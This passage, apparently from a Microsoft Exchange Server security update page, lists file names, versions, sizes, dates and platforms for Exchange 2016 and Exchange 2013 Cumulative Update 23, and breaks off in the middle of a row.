\nMicrosoft.exchange.variantconfiguration.globalsettings.dll| 15.1.2176.14| 27,528| 27-Apr-21| 14:39| x86 \nMicrosoft.exchange.variantconfiguration.hygiene.dll| 15.1.2176.14| 120,712| 27-Apr-21| 14:39| x86 \nMicrosoft.exchange.variantconfiguration.protectionservice.dll| 15.1.2176.14| 31,624| 27-Apr-21| 14:39| x86 \nMicrosoft.exchange.variantconfiguration.threatintel.dll| 15.1.2176.14| 57,224| 27-Apr-21| 14:39| x86 \nMicrosoft.exchange.webservices.auth.dll| 15.1.2176.14| 35,720| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.webservices.dll| 15.1.2176.14| 1,054,072| 27-Apr-21| 14:39| x86 \nMicrosoft.exchange.webservices.xrm.dll| 15.1.2176.14| 67,976| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.wlmservicelet.dll| 15.1.2176.14| 23,416| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.wopiclient.dll| 15.1.2176.14| 77,176| 27-Apr-21| 14:42| x86 \nMicrosoft.exchange.workingset.signalapi.dll| 15.1.2176.14| 17,272| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.workingsetabstraction.signalapiabstraction.dll| 15.1.2176.14| 29,064| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.workloadmanagement.dll| 15.1.2176.14| 505,208| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.workloadmanagement.eventlogs.dll| 15.1.2176.14| 14,736| 27-Apr-21| 14:41| x64 \nMicrosoft.exchange.workloadmanagement.throttling.configuration.dll| 15.1.2176.14| 36,744| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.workloadmanagement.throttling.dll| 15.1.2176.14| 66,440| 27-Apr-21| 14:40| x86 \nMicrosoft.fast.contextlogger.json.dll| 15.1.2176.14| 19,344| 27-Apr-21| 14:40| x86 \nMicrosoft.filtering.dll| 15.1.2176.14| 113,040| 27-Apr-21| 14:40| x86 \nMicrosoft.filtering.exchange.dll| 15.1.2176.14| 57,208| 27-Apr-21| 14:40| x86 \nMicrosoft.filtering.interop.dll| 15.1.2176.14| 15,240| 27-Apr-21| 14:40| x86 \nMicrosoft.forefront.activedirectoryconnector.dll| 15.1.2176.14| 46,968| 27-Apr-21| 14:41| x86 \nMicrosoft.forefront.activedirectoryconnector.eventlog.dll| 15.1.2176.14| 15,760| 27-Apr-21| 14:41| x64 \nMicrosoft.forefront.filtering.common.dll| 15.1.2176.14| 23,928| 27-Apr-21| 14:40| x86 \nMicrosoft.forefront.filtering.diagnostics.dll| 15.1.2176.14| 22,416| 27-Apr-21| 14:41| x86 \nMicrosoft.forefront.filtering.eventpublisher.dll| 15.1.2176.14| 34,704| 27-Apr-21| 14:41| x86 \nMicrosoft.forefront.management.powershell.format.ps1xml| Not applicable| 48,910| 27-Apr-21| 14:40| Not applicable \nMicrosoft.forefront.management.powershell.types.ps1xml| Not applicable| 16,290| 27-Apr-21| 14:40| Not applicable \nMicrosoft.forefront.monitoring.activemonitoring.local.components.dll| 15.1.2176.14| 1,518,984| 27-Apr-21| 14:41| x86 \nMicrosoft.forefront.monitoring.activemonitoring.local.components.messages.dll| 15.1.2176.14| 13,192| 27-Apr-21| 14:40| x64 \nMicrosoft.forefront.monitoring.management.outsidein.dll| 15.1.2176.14| 33,160| 27-Apr-21| 14:41| x86 \nMicrosoft.forefront.recoveryactionarbiter.contract.dll| 15.1.2176.14| 18,312| 27-Apr-21| 14:40| x86 \nMicrosoft.forefront.reporting.common.dll| 15.1.2176.14| 46,480| 27-Apr-21| 14:40| x86 \nMicrosoft.forefront.reporting.ondemandquery.dll| 15.1.2176.14| 50,560| 27-Apr-21| 14:40| x86 \nMicrosoft.isam.esent.collections.dll| 15.1.2176.14| 72,568| 27-Apr-21| 14:40| x86 \nMicrosoft.isam.esent.interop.dll| 15.1.2176.14| 533,904| 27-Apr-21| 14:41| x86 \nMicrosoft.managementgui.dll| 15.1.2176.14| 133,520| 27-Apr-21| 14:40| x86 \nMicrosoft.mce.interop.dll| 15.1.2176.14| 24,456| 27-Apr-21| 14:40| x86 \nMicrosoft.office.audit.dll| 15.1.2176.14| 123,784| 27-Apr-21| 14:40| x86 \nMicrosoft.office.client.discovery.unifiedexport.dll| 15.1.2176.14| 593,280| 27-Apr-21| 14:40| x86 \nMicrosoft.office.common.ipcommonlogger.dll| 15.1.2176.14| 42,376| 27-Apr-21| 14:40| x86 \nMicrosoft.office.compliance.console.core.dll| 15.1.2176.14| 218,000| 27-Apr-21| 14:39| x86 \nMicrosoft.office.compliance.console.dll| 15.1.2176.14| 854,928| 27-Apr-21| 14:39| x86 \nMicrosoft.office.compliance.console.extensions.dll| 15.1.2176.14| 485,752| 27-Apr-21| 14:40| x86 \nMicrosoft.office.compliance.core.dll| 15.1.2176.14| 413,072| 27-Apr-21| 14:40| x86 \nMicrosoft.office.compliance.ingestion.dll| 15.1.2176.14| 36,232| 27-Apr-21| 14:40| x86 \nMicrosoft.office.compliancepolicy.exchange.dar.dll| 15.1.2176.14| 84,856| 27-Apr-21| 14:40| x86 \nMicrosoft.office.compliancepolicy.platform.dll| 15.1.2176.14| 1,782,152| 27-Apr-21| 14:40| x86 \nMicrosoft.office.datacenter.activemonitoring.management.common.dll| 15.1.2176.14| 49,544| 27-Apr-21| 14:40| x86 \nMicrosoft.office.datacenter.activemonitoring.management.dll| 15.1.2176.14| 27,528| 27-Apr-21| 14:41| x86 \nMicrosoft.office.datacenter.activemonitoringlocal.dll| 15.1.2176.14| 174,976| 27-Apr-21| 14:40| x86 \nMicrosoft.office.datacenter.monitoring.activemonitoring.recovery.dll| 15.1.2176.14| 166,288| 27-Apr-21| 14:41| x86 \nMicrosoft.office365.datainsights.uploader.dll| 15.1.2176.14| 40,336| 27-Apr-21| 14:39| x86 \nMicrosoft.online.box.shell.dll| 15.1.2176.14| 46,456| 27-Apr-21| 14:39| x86 \nMicrosoft.powershell.hostingtools.dll| 15.1.2176.14| 67,968| 27-Apr-21| 14:39| x86 \nMicrosoft.powershell.hostingtools_2.dll| 15.1.2176.14| 67,968| 27-Apr-21| 14:39| x86 \nMicrosoft.tailoredexperiences.core.dll| 15.1.2176.14| 120,184| 27-Apr-21| 14:41| x86 \nMigrateumcustomprompts.ps1| Not applicable| 19,106| 27-Apr-21| 14:42| Not applicable \nModernpublicfoldertomailboxmapgenerator.ps1| Not applicable| 29,064| 27-Apr-21| 14:42| Not applicable \nMovemailbox.ps1| Not applicable| 61,108| 27-Apr-21| 14:42| Not applicable \nMovetransportdatabase.ps1| Not applicable| 30,586| 27-Apr-21| 14:41| Not applicable \nMove_publicfolderbranch.ps1| Not applicable| 17,516| 27-Apr-21| 14:42| Not applicable \nMpgearparser.dll| 15.1.2176.14| 99,728| 27-Apr-21| 14:41| x64 \nMsclassificationadapter.dll| 15.1.2176.14| 248,696| 27-Apr-21| 14:41| x64 \nMsexchangecompliance.exe| 15.1.2176.14| 78,712| 27-Apr-21| 14:40| x86 \nMsexchangedagmgmt.exe| 15.1.2176.14| 25,480| 27-Apr-21| 14:41| x86 \nMsexchangedelivery.exe| 15.1.2176.14| 38,800| 27-Apr-21| 14:41| x86 \nMsexchangefrontendtransport.exe| 15.1.2176.14| 31,608| 27-Apr-21| 14:40| x86 \nMsexchangehmhost.exe| 15.1.2176.14| 27,000| 27-Apr-21| 14:40| x86 \nMsexchangehmrecovery.exe| 15.1.2176.14| 29,576| 27-Apr-21| 14:40| x86 \nMsexchangemailboxassistants.exe| 15.1.2176.14| 72,584| 27-Apr-21| 14:40| x86 \nMsexchangemailboxreplication.exe| 15.1.2176.14| 20,872| 27-Apr-21| 14:40| x86 \nMsexchangemigrationworkflow.exe| 15.1.2176.14| 69,008| 27-Apr-21| 14:41| x86 \nMsexchangerepl.exe| 15.1.2176.14| 71,048| 27-Apr-21| 14:40| x86 \nMsexchangesubmission.exe| 15.1.2176.14| 123,272| 27-Apr-21| 14:40| x86 \nMsexchangethrottling.exe| 15.1.2176.14| 39,800| 27-Apr-21| 14:40| x86 \nMsexchangetransport.exe| 15.1.2176.14| 74,120| 27-Apr-21| 14:40| x86 \nMsexchangetransportlogsearch.exe| 15.1.2176.14| 139,128| 27-Apr-21| 14:40| x86 \nMsexchangewatchdog.exe| 15.1.2176.14| 55,688| 27-Apr-21| 14:40| x64 \nMspatchlinterop.dll| 15.1.2176.14| 53,624| 27-Apr-21| 14:41| x64 \nNativehttpproxy.dll| 15.1.2176.14| 91,512| 27-Apr-21| 14:41| x64 \nNavigatorparser.dll| 15.1.2176.14| 636,816| 27-Apr-21| 14:42| x64 \nNego2nativeinterface.dll| 15.1.2176.14| 19,320| 27-Apr-21| 14:40| x64 \nNegotiateclientcertificatemodule.dll| 15.1.2176.14| 30,072| 27-Apr-21| 14:41| x64 \nNewtestcasconnectivityuser.ps1| Not applicable| 22,248| 27-Apr-21| 14:42| Not applicable \nNewtestcasconnectivityuserhosting.ps1| Not applicable| 24,563| 27-Apr-21| 14:42| Not applicable \nNtspxgen.dll| 15.1.2176.14| 80,760| 27-Apr-21| 14:40| x64 \nOleconverter.exe| 15.1.2176.14| 173,944| 27-Apr-21| 14:41| x64 \nOutsideinmodule.dll| 15.1.2176.14| 87,944| 27-Apr-21| 14:42| x64 \nOwaauth.dll| 15.1.2176.14| 92,048| 27-Apr-21| 14:39| x64 \nOwasmime.msi| Not applicable| 716,800| 27-Apr-21| 14:40| Not applicable \nPerf_common_extrace.dll| 15.1.2176.14| 245,128| 27-Apr-21| 14:39| x64 \nPerf_exchmem.dll| 15.1.2176.14| 85,880| 27-Apr-21| 14:39| x64 \nPipeline2.dll| 15.1.2176.14| 1,454,480| 27-Apr-21| 14:40| x64 \nPowershell.rbachostingtools.dll_1bf4f3e363ef418781685d1a60da11c1| 15.1.2176.14| 41,360| 27-Apr-21| 14:39| Not applicable \nPreparemoverequesthosting.ps1| Not applicable| 70,995| 27-Apr-21| 14:41| Not applicable \nPrepare_moverequest.ps1| Not applicable| 73,213| 27-Apr-21| 14:42| Not applicable \nProductinfo.managed.dll| 15.1.2176.14| 27,016| 27-Apr-21| 14:41| x86 \nProxybinclientsstringsdll| 15.1.2176.14| 924,552| 27-Apr-21| 14:41| x86 \nPublicfoldertomailboxmapgenerator.ps1| Not applicable| 23,222| 27-Apr-21| 14:42| Not applicable \nQuietexe.exe| 15.1.2176.14| 14,728| 27-Apr-21| 14:40| x86 \nRedistributeactivedatabases.ps1| Not applicable| 250,524| 27-Apr-21| 14:40| Not applicable \nReinstalldefaulttransportagents.ps1| Not applicable| 21,675| 27-Apr-21| 14:40| Not applicable \nRemoteexchange.ps1| Not applicable| 23,593| 27-Apr-21| 14:40| Not applicable \nRemoveuserfrompfrecursive.ps1| Not applicable| 14,664| 27-Apr-21| 14:42| Not applicable \nReplaceuserpermissiononpfrecursive.ps1| Not applicable| 14,982| 27-Apr-21| 14:42| Not applicable \nReplaceuserwithuseronpfrecursive.ps1| Not applicable| 15,012| 27-Apr-21| 14:42| Not applicable \nReplaycrimsonmsg.dll| 15.1.2176.14| 1,099,128| 27-Apr-21| 14:40| x64 \nResetattachmentfilterentry.ps1| Not applicable| 15,488| 27-Apr-21| 14:40| Not applicable \nResetcasservice.ps1| Not applicable| 21,691| 27-Apr-21| 14:42| Not applicable \nReset_antispamupdates.ps1| Not applicable| 14,121| 27-Apr-21| 14:42| Not applicable \nRestoreserveronprereqfailure.ps1| Not applicable| 15,141| 27-Apr-21| 14:41| Not applicable \nResumemailboxdatabasecopy.ps1| Not applicable| 17,190| 27-Apr-21| 14:40| Not applicable \nRightsmanagementwrapper.dll| 15.1.2176.14| 86,408| 27-Apr-21| 14:40| x64 \nRollalternateserviceaccountpassword.ps1| Not applicable| 55,786| 27-Apr-21| 14:41| Not applicable \nRpcperf.dll| 15.1.2176.14| 23,432| 27-Apr-21| 14:40| x64 \nRpcproxyshim.dll| 15.1.2176.14| 39,312| 27-Apr-21| 14:40| x64 \nRulesauditmsg.dll| 15.1.2176.14| 12,688| 27-Apr-21| 14:41| x64 \nRwsperfcounters.xml| Not applicable| 23,000| 27-Apr-21| 14:40| Not applicable \nSafehtmlnativewrapper.dll| 15.1.2176.14| 34,704| 27-Apr-21| 14:40| x64 \nScanenginetest.exe| 15.1.2176.14| 956,280| 27-Apr-21| 14:40| x64 \nScanningprocess.exe| 15.1.2176.14| 739,216| 27-Apr-21| 14:40| x64 \nSearchdiagnosticinfo.ps1| Not applicable| 16,796| 27-Apr-21| 14:42| Not applicable \nServicecontrol.ps1| Not applicable| 52,329| 27-Apr-21| 14:41| Not applicable \nSetmailpublicfolderexternaladdress.ps1| Not applicable| 20,754| 27-Apr-21| 14:42| Not applicable \nSettingsadapter.dll| 15.1.2176.14| 116,112| 27-Apr-21| 14:40| x64 \nSetup.exe| 15.1.2176.14| 20,880| 27-Apr-21| 14:39| x86 \nSetupui.exe| 15.1.2176.14| 49,024| 27-Apr-21| 14:41| x86 \nSplit_publicfoldermailbox.ps1| Not applicable| 52,189| 27-Apr-21| 14:42| Not applicable \nStartdagservermaintenance.ps1| Not applicable| 27,827| 27-Apr-21| 14:40| Not applicable \nStatisticsutil.dll| 15.1.2176.14| 142,224| 27-Apr-21| 14:41| x64 \nStopdagservermaintenance.ps1| Not applicable| 21,117| 27-Apr-21| 14:40| Not applicable \nStoretsconstants.ps1| Not applicable| 15,814| 27-Apr-21| 14:39| Not applicable \nStoretslibrary.ps1| Not applicable| 27,987| 27-Apr-21| 14:39| Not applicable \nStore_mapi_net_bin_perf_x64_exrpcperf.dll| 15.1.2176.14| 28,536| 27-Apr-21| 14:42| x64 \nSync_mailpublicfolders.ps1| Not applicable| 43,927| 27-Apr-21| 14:42| Not applicable \nSync_modernmailpublicfolders.ps1| Not applicable| 43,973| 27-Apr-21| 14:41| Not applicable \nTextconversionmodule.dll| 15.1.2176.14| 86,416| 27-Apr-21| 14:40| x64 \nTroubleshoot_ci.ps1| Not applicable| 22,707| 27-Apr-21| 14:40| Not applicable \nTroubleshoot_databaselatency.ps1| Not applicable| 33,453| 27-Apr-21| 14:40| Not applicable \nTroubleshoot_databasespace.ps1| Not applicable| 30,049| 27-Apr-21| 14:39| Not applicable \nUmservice.exe| 15.1.2176.14| 100,232| 27-Apr-21| 14:41| x86 \nUmworkerprocess.exe| 15.1.2176.14| 38,264| 27-Apr-21| 14:40| x86 \nUninstall_antispamagents.ps1| Not applicable| 15,457| 27-Apr-21| 14:42| Not applicable \nUpdateapppoolmanagedframeworkversion.ps1| Not applicable| 14,014| 27-Apr-21| 14:42| Not applicable \nUpdatecas.ps1| Not applicable| 32,948| 27-Apr-21| 14:41| Not applicable \nUpdateconfigfiles.ps1| Not applicable| 19,742| 27-Apr-21| 14:41| Not applicable \nUpdateserver.exe| 15.1.2176.14| 3,014,520| 27-Apr-21| 14:42| x64 \nUpdate_malwarefilteringserver.ps1| Not applicable| 18,156| 27-Apr-21| 14:42| Not applicable \nWeb.config_053c31bdd6824e95b35d61b0a5e7b62d| Not applicable| 31,816| 27-Apr-21| 14:39| Not applicable \nWsbexchange.exe| 15.1.2176.14| 125,304| 27-Apr-21| 14:41| x64 \nX400prox.dll| 15.1.2176.14| 103,304| 27-Apr-21| 14:39| x64 \n_search.lingoperators.a| 15.1.2176.14| 34,680| 27-Apr-21| 14:40| Not applicable \n_search.lingoperators.b| 15.1.2176.14| 34,680| 27-Apr-21| 14:40| Not applicable \n_search.mailboxoperators.a| 15.1.2176.14| 289,160| 27-Apr-21| 14:40| Not applicable \n_search.mailboxoperators.b| 15.1.2176.14| 289,160| 27-Apr-21| 14:40| Not applicable \n_search.operatorschema.a| 15.1.2176.14| 483,208| 27-Apr-21| 14:40| Not applicable \n_search.operatorschema.b| 15.1.2176.14| 483,208| 27-Apr-21| 14:40| Not applicable \n_search.tokenoperators.a| 15.1.2176.14| 106,896| 27-Apr-21| 14:40| Not applicable \n_search.tokenoperators.b| 15.1.2176.14| 106,896| 27-Apr-21| 14:40| Not applicable \n_search.transportoperators.a| 15.1.2176.14| 64,904| 27-Apr-21| 14:40| Not applicable \n_search.transportoperators.b| 15.1.2176.14| 64,904| 27-Apr-21| 14:40| Not applicable \n \n### \n\n__\n\nMicrosoft Exchange Server 2013 Cumulative Update 23\n\nFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nFil265b8ec6d4ed498b5382cfc1027491a2| Not applicable| 82,741| 10-Sep-20| 8:09| Not applicable \nFil280c8cbd4386b442b5c94af6708eaac8| Not applicable| 16,625| 10-Sep-20| 8:10| Not applicable \nFil283358d58bb98df0557b67b6f747c86a| Not applicable| 460,146| 10-Sep-20| 8:07| Not applicable \nFil28b2b9d1b7e313e502a8835045c2d0d0| Not applicable| 15,031| 10-Sep-20| 8:10| Not applicable \nFil2a6b0663833d438eea50ffe81c51ec83| Not applicable| 2,003,228| 10-Sep-20| 8:05| Not applicable \nFil2adab262add65203b0c7c5bc1251e47f| Not applicable| 312,638| 10-Sep-20| 8:08| Not applicable \nFil2b2ac38f6e7b4a0553da72f403582cd5| Not applicable| 1,727| 10-Sep-20| 8:10| Not applicable \nFil2bd8c15c9164155f212951a70631823f| Not applicable| 5,285| 10-Sep-20| 8:10| Not applicable \nFil2c21ffd8eb5ecd0f7c89a27b86951a7d| Not applicable| 10,821| 10-Sep-20| 8:09| Not applicable \nFil2db733aabd2264a64057e89820aca13c| Not applicable| 13,759| 10-Sep-20| 8:10| Not applicable \nFil2e63bcb4a6d04e10c147a6c3f92bfcab| Not applicable| 670,945| 10-Sep-20| 8:09| Not applicable \nFil2e6b2f8c3954b6bbc8ab2a22d1438d67| Not applicable| 114,990| 10-Sep-20| 8:09| Not applicable \nFil2eba4c3b1398dc2169d3a58cf26d7494| Not applicable| 3,169| 10-Sep-20| 8:10| Not applicable \nFil2f58bbe281f35794e1fadfd2d5372340| Not applicable| 151,951| 10-Sep-20| 8:09| Not applicable \nFil31e9f5684b0b5ea70746907556f64515| Not applicable| 296,876| 10-Sep-20| 8:09| Not applicable \nFil32c87816f9a713092dc110787ef42586| Not applicable| 35,050| 10-Sep-20| 8:08| Not applicable \nFil32ede05fb6827d1a783e56be2937e471| Not applicable| 153,091| 10-Sep-20| 8:08| Not applicable \nFil344d9c6f4f02142eba8c624f965acd67| Not applicable| 121,941| 10-Sep-20| 8:08| Not applicable \nFil363d000c227039f27c69b128287ff68e| Not applicable| 186,041| 10-Sep-20| 8:07| Not applicable \nFil36da999539f10f4939d3c19fb7e77d53| Not applicable| 11,324| 10-Sep-20| 8:09| Not applicable \nFil37589a1bee605be2ae1422c6d19521cd| Not applicable| 384,396| 10-Sep-20| 8:09| Not applicable \nFil3804327ae3bca4c1a589eed2acaf0909| Not applicable| 1,739| 10-Sep-20| 8:10| Not applicable \nFil38494a0e60def94d88e8724029463551| Not applicable| 83,497| 10-Sep-20| 8:07| Not applicable \nFil3859e6d9c6cf748d05be23536b9221c4| Not applicable| 124,060| 10-Sep-20| 8:10| Not applicable \nFil39ee1f35ad97bd462c3ac5aec000a1c0| Not applicable| 210,413| 10-Sep-20| 8:10| Not applicable \nFil3a42ef50a1ae3edbb7a00bc22f3434e3| Not applicable| 24,337| 10-Sep-20| 8:03| Not applicable \nFil3b12709b2a6d1f6a5a9d96edbc2a9dd2| Not applicable| 211,288| 10-Sep-20| 8:09| Not applicable \nFil3b8cc2b36f720baad95be0910e9346eb| Not applicable| 154,799| 10-Sep-20| 8:10| Not applicable \nFil3c3fb88b0193db7b45726833c054d1ed| Not applicable| 4,920| 10-Sep-20| 8:10| Not applicable \nFil3cccb1e1cc9707666a7232847b28158a| Not applicable| 148,810| 10-Sep-20| 8:10| Not applicable \nFil3d3af8f03141aadd16d3951f471e4ecd| Not applicable| 472,586| 10-Sep-20| 8:10| Not applicable \nFil3d952efb9613d0f0fa9c884c2e197c47| Not applicable| 64,742| 10-Sep-20| 8:07| Not applicable \nFil3d96340571dcbbca40f9dda36cf8cc23| Not applicable| 376,491| 10-Sep-20| 8:08| Not applicable \nFil3db21a7c265bee0f8897197ab8184cbb| Not applicable| 407,449| 10-Sep-20| 8:11| Not applicable \nFil3e7cd5352ab27351d37dc5a0d70eb5da| Not applicable| 8,202| 10-Sep-20| 8:10| Not applicable \nFil401dc81859f7ddf0518e04d60fb6f0f0| Not applicable| 127,242| 10-Sep-20| 8:08| Not applicable \nFil4032894f9d18775fe5b8f517b9446ed2| Not applicable| 247,259| 10-Sep-20| 8:09| Not applicable \nFil426e71bd7d39fbdac2f9aac2641b16f3| Not applicable| 1,923| 10-Sep-20| 8:10| Not applicable \nFil4278d1df336a84435b4ce9034fb1a172| Not applicable| 718| 10-Sep-20| 8:10| Not applicable \nFil42a5edd14a3d3f555fcd6172e48921fb| Not applicable| 157,961| 10-Sep-20| 8:09| Not applicable \nFil42c22971f1d5dc2196265e92d6da872f| Not applicable| 150,392| 10-Sep-20| 8:11| Not applicable \nFil442f08df8632cfa5f8638445f7151f04| Not applicable| 956| 10-Sep-20| 8:10| Not applicable \nFil449a3b586a9163232e7d21b204dff9e2| Not applicable| 1,316| 10-Sep-20| 8:10| Not applicable \nFil44a698d38545e9cd051d9db8fdfc900e| Not applicable| 225,606| 10-Sep-20| 8:10| Not applicable \nFil44afe89b21b16bf4b609ab451085526a| Not applicable| 373,865| 10-Sep-20| 8:08| Not applicable \nFil44d189470b9393ed19ca08defd240a38| Not applicable| 216,698| 10-Sep-20| 8:10| Not applicable \nFil45cd37ad6b0169d99d0eb6dcba7d08d9| Not applicable| 166,781| 10-Sep-20| 8:10| Not applicable \nFil46233812dcee5af00423b2fc332d0c5d| Not applicable| 2,015,045| 10-Sep-20| 8:05| Not applicable \nFil46ef8081ccac6e0c239c52cfc8c58dcf| Not applicable| 4,743| 10-Sep-20| 8:07| Not applicable \nFil476b430823a50cf77d9968f03858d69d| Not applicable| 359,078| 10-Sep-20| 8:08| Not applicable \nFil481ea15e0071beee36e6711fe55c7372| Not applicable| 307,725| 10-Sep-20| 8:08| Not applicable \nFil4a3306ef5eda0d022a521f8bd6c3d940| Not applicable| 158,115| 10-Sep-20| 8:08| Not applicable \nFil4a79082a6a63aa24efbd3f71b1a9f8e8| Not applicable| 139,064| 10-Sep-20| 8:09| Not applicable \nFil4aa30f91267dc1dffacc9bb3f9e43367| Not applicable| 1,972| 10-Sep-20| 8:10| Not applicable \nFil4b622a1d73e8a02febd3ad6f59e8b98c| Not applicable| 12,107| 10-Sep-20| 8:10| Not applicable \nFil4bc634eae6f3c142c6ed8d2927520cc3| Not applicable| 5,653| 10-Sep-20| 8:10| Not applicable \nFil4bd7eb36b7c3567f715d5365f8047204| Not applicable| 142,286| 10-Sep-20| 8:10| Not applicable \nFil4c0ab8720533c89e68ce63e86d429dde| Not applicable| 381,163| 10-Sep-20| 8:08| Not applicable \nFil4c177d04b538b102de0bc7af504ade88| Not applicable| 1,264| 10-Sep-20| 8:10| Not applicable \nFil4cc43ed047118c3c70489c99f391ad41| Not applicable| 570,339| 10-Sep-20| 8:08| Not applicable \nFil4cfa7a61721252f62fb29a0f1805bd48| Not applicable| 151,467| 10-Sep-20| 8:09| Not applicable \nFil4d0f14d8c2b6b77898bcc5954a8335d4| Not applicable| 12,161| 10-Sep-20| 8:10| Not applicable \nFil4d393ab247c2ec19d982c087d694252e| Not applicable| 485,168| 10-Sep-20| 8:09| Not applicable \nFil4e4dfdf527ace3b42d88eaea58ad4e00| Not applicable| 110,057| 10-Sep-20| 8:11| Not applicable \nFil4f050d584b052cef56c611c7a6fc0b4d| Not applicable| 440,314| 10-Sep-20| 8:10| Not applicable \nFil4f0ff802c3382fc6cb28e90145915a91| Not applicable| 155,232| 10-Sep-20| 8:08| Not applicable \nFil4fbdcc69c6687636e427226aab76d82c| Not applicable| 165,120| 10-Sep-20| 8:08| Not applicable \nFil50c8b757b4933533069fdb8f6b905e0d| Not applicable| 158,190| 10-Sep-20| 8:09| Not applicable \nFil50e303dde9fe96807796a25979e2814a| Not applicable| 252,966| 10-Sep-20| 8:08| Not applicable \nFil538089ef224df4976d311e8302364c00| Not applicable| 1,152,608| 10-Sep-20| 8:12| Not applicable \nFil5387207480a1873bc7ed50c9eaed89c7| Not applicable| 2,003,225| 10-Sep-20| 8:06| Not applicable \nFil53acea05108c4f46ff21c66f40cfaeec| Not applicable| 150,387| 10-Sep-20| 8:08| Not applicable \nFil540e2d0af94e0e486cae7a4a9e109676| Not applicable| 215,778| 10-Sep-20| 8:10| Not applicable \nFil541882cdf469df98dbf0ac462de46344| Not applicable| 575,597| 10-Sep-20| 8:09| Not applicable \nFil543079c26bd28998e4563bbd4cac1644| Not applicable| 4,186| 10-Sep-20| 8:10| Not applicable \nFil54337210b89f5380a40a0904d6d860f8| Not applicable| 1,729| 10-Sep-20| 8:10| Not applicable \nFil5542b08a74ea880a5f2bd8b269fc1231| Not applicable| 250,545| 10-Sep-20| 8:09| Not applicable \nFil57beb556aec2d6e97c7b317de9f72304| Not applicable| 322,662| 10-Sep-20| 8:08| Not applicable \nFil57fcce90719eee5eff1f954327649e53| Not applicable| 222,952| 10-Sep-20| 8:08| Not applicable \nFil58337dc668f3e1a94ebd035dc310ef3a| Not applicable| 3,653| 10-Sep-20| 8:10| Not applicable \nFil59074b5deefeb2b4d32b58953cb77f9e| Not applicable| 202,678| 10-Sep-20| 8:07| Not applicable \nFil596d2b532682a216aced5af81a34785e| Not applicable| 371,817| 10-Sep-20| 8:08| Not applicable \nFil5aef2df4d623713792ff2e54a0abea77| Not applicable| 3,391| 10-Sep-20| 8:10| Not applicable \nFil5b481af97947b02636fefbad6cf5332e| Not applicable| 10,504| 10-Sep-20| 8:10| Not applicable \nFil5b51bde4cf501f9d89d6fdd6084fb0dc| Not applicable| 76,238| 10-Sep-20| 8:07| Not applicable \nFil5c8127dbccdda444e35671ff4a274fc5| Not applicable| 164,462| 10-Sep-20| 8:08| Not applicable \nFil5cd88aaf0a21ddb716f1da478f29fe22| Not applicable| 68,607| 10-Sep-20| 8:03| Not applicable \nFil5d2722dc3289787a79451240b7a88ef3| Not applicable| 1,218| 10-Sep-20| 8:10| Not applicable \nFil5d6827cff217e4dfce3affa1aa55d8f3| Not applicable| 476,341| 10-Sep-20| 8:09| Not applicable \nFil5e56ac7a5a17eeba25534e146a5b96c5| Not applicable| 187,286| 10-Sep-20| 8:10| Not applicable \nFil5f4f6a29ca46dc40a4f6ac9b8b772ce3| Not applicable| 203,484| 10-Sep-20| 8:09| Not applicable \nFil5fd4bc51ae2ad462403cdc6a0cf9ffd0| Not applicable| 311,764| 10-Sep-20| 8:10| Not applicable \nFil604f37df9e3b6c4d7c48f14c35a26977| Not applicable| 126,177| 10-Sep-20| 8:08| Not applicable \nFil610677a0034b8232f2b460d83c22ce46| Not applicable| 481,442| 10-Sep-20| 8:09| Not applicable \nFil6133c70794989aad906ec1c690498770| Not applicable| 1,669| 10-Sep-20| 8:10| Not applicable \nFil63179e1cb286b0ef11dc63dc6af82432| Not applicable| 14,116| 10-Sep-20| 8:10| Not applicable \nFil6356fbacb88d6b1b13e09aadb6887fbe| Not applicable| 161,576| 10-Sep-20| 8:10| Not applicable \nFil64dd0c27769e484c139e2503ec3eef51| Not applicable| 218,860| 10-Sep-20| 8:10| Not applicable \nFil65080648928ede60012994a0baeca00b| Not applicable| 309,691| 10-Sep-20| 8:09| Not applicable \nFil6ad129a5d744ab89f7b431d1d495262a| Not applicable| 60,605| 10-Sep-20| 8:08| Not applicable \nFil6ae5c571deb81c557347776937eec424| Not applicable| 327,120| 10-Sep-20| 8:08| Not applicable \nFil6c511826bfeecb77f6559c6b60d65511| Not applicable| 360,888| 10-Sep-20| 8:09| Not applicable \nFil6c6539569c8b5a20bd7f4dc318576341| Not applicable| 305,628| 10-Sep-20| 8:09| Not applicable \nFil6d0c3c83a060d3235e4a034bf754cdde| Not applicable| 139,720| 10-Sep-20| 8:09| Not applicable \nFil6ec9b1a61bc1b1de3666c8f074b638b0| Not applicable| #########| 10-Sep-20| 8:12| Not applicable \nFil6f8d2fab306d136e7656db49710c3a48| Not applicable| 3,636| 10-Sep-20| 8:10| Not applicable \nFil6fe7b10d2287827cf3c81b58b9c8b8ff| Not applicable| 304,524| 10-Sep-20| 8:10| Not applicable \nFil7189adae9ca485f37c0c74269ff71aca| Not applicable| 12,644| 10-Sep-20| 8:10| Not applicable \nFil71e73a51dc2a21736116b8807bb466e8| Not applicable| 156,649| 10-Sep-20| 8:09| Not applicable \nFil7207154834a23fbc29d011e71d208a39| Not applicable| 163,997| 10-Sep-20| 8:10| Not applicable \nFil720fe9713dec6be87ee03bce38fbfc36| Not applicable| 321,069| 10-Sep-20| 8:08| Not applicable \nFil7332c61fe6101e9bae82c487d99082df| Not applicable| 916| 10-Sep-20| 8:10| Not applicable \nFil736e7b808675fe35044733ce258a9a73| Not applicable| 209,717| 10-Sep-20| 8:09| Not applicable \nFil73c9286d8470aa113cba01507403eeba| Not applicable| 123,453| 10-Sep-20| 8:10| Not applicable \nFil73dbdc432c5bb5f29330a83a9faa7ae1| Not applicable| 319,119| 10-Sep-20| 8:10| Not applicable \nFil74f06c9b75edb14687c2262ad6ae2557| Not applicable| 310,368| 10-Sep-20| 8:08| Not applicable \nFil7511efbde449570e1079881ef478d89f| Not applicable| 328,987| 10-Sep-20| 8:10| Not applicable \nFil75c2cda8a128e765ff0af0755bfd328b| Not applicable| 145,359| 10-Sep-20| 8:09| Not applicable \nFil7622d867b4e32c321108f9585ae213e0| Not applicable| 143,754| 10-Sep-20| 8:10| Not applicable \nFil764919a245fe2bc500925814cddfbdad| Not applicable| 72,860| 10-Sep-20| 8:03| Not applicable \nFil76a84f20ffd55d7ea12ac35d8380efd5| Not applicable| 425,083| 